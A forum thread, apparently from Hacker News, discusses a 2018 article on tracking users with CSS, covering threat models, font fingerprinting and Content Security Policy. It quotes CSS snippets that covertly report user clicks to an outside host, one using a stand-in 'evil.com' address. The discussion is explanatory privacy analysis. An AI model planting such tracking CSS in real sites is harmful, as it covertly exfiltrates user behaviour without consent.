Tracking Users with CSS (2018)
templarbit.comThis article seems to have a threat model where a website is “compromised” into sending user data to a third party, but I don’t really see anything that protects users from a website whose owner actively wants to track them. This is an odd threat model to have.
Also, as an aside:
> For example, by detecting whether the browser supports the Calibri font family, we can assume that the browser is running in Windows
I’m pretty sure that Safari has stopped allowing the use of third party fonts for exactly this reason, and now reports a standard set of fonts as being available.
You can't assume that only the origin will be serving css. Most pages these days contain resources from all over the web, and most developers assume that CSS is safe to load from anywhere. What's not clear to me is whether 'evil' in content: url("https://evil.com/track?action=link_clicked" can point to anywhere on the web? Or just the origin of the css? Or...?
Depends on the Content Security Policy of the site.
Yes, of course - but what is the default if you don't have a CSP? I guess I will have to do the experiment.
Apologies, wasn't trying to be snarky. If you are configured to allow resources to load from anywhere, the CSS can load a resource from anywhere, not just the location it originated from. These kinds of configurations are increasingly less the default, however, so depending your specific setup, you may find that some origin policies are in place by default. This is entirely dependent on your chain, however, including browser settings.
There are multiple sites that allow users to set custom CSS. Consider for example subreddit styles on reddit or the customisation of Tumblr pages.
One big selling point for CSS was to separate layout and content exactly to allow other people to write CSS.
It's the threat model that the customers they're trying to bring in would care about.
I like the idea of loading all linked content at page load time.
That’s bad for mobile - especially if a website has really large images for high-DPI devices. I think you can configure some mobile browsers to always download low-DPI assets to save on bandwidth.
You could make it optional. Right now there's almost nothing you can do when you visit a site even if you know it uses this technique.
By linked I hope that you mean things like images and CSS style-sheets rather than actual <a> links. If so, I totally agree with you, this kind of lazy loading that css utilises is a true privacy nightmare.
Previous discussion:
Afaik doesnt work on Firefox.
And if you are using anything but Firefox you shouldn't worry about your browser history anyway. Due to fingerprintning you give all of your browsing history to Google regardless.
Css is fundamentally breaching the contract by messing in any way whatsoever with content.
You can still do this
input[type="button"]:active { background-image: url('http://www.google-analytics.com/collect?v=1&_v=j23&a=...'); }
https://www.smashingmagazine.com/2014/10/css-only-solution-f...